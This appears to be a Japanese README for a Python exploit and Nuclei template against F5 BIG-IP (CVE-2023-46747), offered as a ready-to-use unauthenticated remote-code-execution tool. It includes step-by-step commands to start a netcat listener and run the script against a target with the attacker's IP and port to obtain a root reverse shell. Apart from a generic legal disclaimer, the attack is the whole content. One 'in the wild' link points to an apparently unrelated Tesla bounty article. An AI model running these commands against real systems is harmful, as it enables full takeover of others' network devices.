
#F5-BIG-IP-CVE-2023-46747-Exploit – 未認証RCE RaguramanによるPythonエクスプロイト&Nucleiテンプレート ✓ 自動TCPリバースシェル(LHOST/LPORT) ✓ 影響を受けるBIG-IP 13.x–17.xでテスト済み ⚠️ 許可されたペンテストのみ
Python3 & Nuclei バージョン – raguraman 作
AJP + HTTPリクエストスモグリングを介した重大な認証なしRCE (CVSS 9.8)
未パッチのすべてのBIG-IP 13.x → 17.x (最新の17.1.0.3を含む) で動作
パッチ: https://my.f5.com/manage/s/article/K000137353 (2023年11月)
実環境でのエクスプロイト解説: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd
f5-bigip-cve-2023-46747-revshell.py → スタンドアロンのPython3 (推奨)CVE-2023-46747-revshell.yaml → Nucleiテンプレート (任意)# 1. リスナーを起動
nc -lvnp 4444
# 2. エクスプロイトを実行 (IPまたはドメインで動作)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50 YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444
# → 即座にrootシェル!
使用法 – Nuclei テンプレート (代替)
Bash # 1. YAMLファイル内のLHOSTとLPORTを編集
# 2. リスナーを起動
nc -lvnp 4444
# 3. スキャン
nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com
# 法的警告
このツールは、以下のような認可されたセキュリティテスト専用に意図されています。
承認されたペネトレーションテスト業務
書面による許可を得たレッドチーム運用
管理された実験室環境での研究
このエクスプロイトを、所有していない、またはテストする明示的な許可がないシステムに使用しないでください。
無断使用は違法であり、刑事訴追につながる可能性があります。
このツールを使用することで、適用される法律の遵守に対してすべての責任を負うことになります。
作者は、誤用または損害について一切の責任を負いません。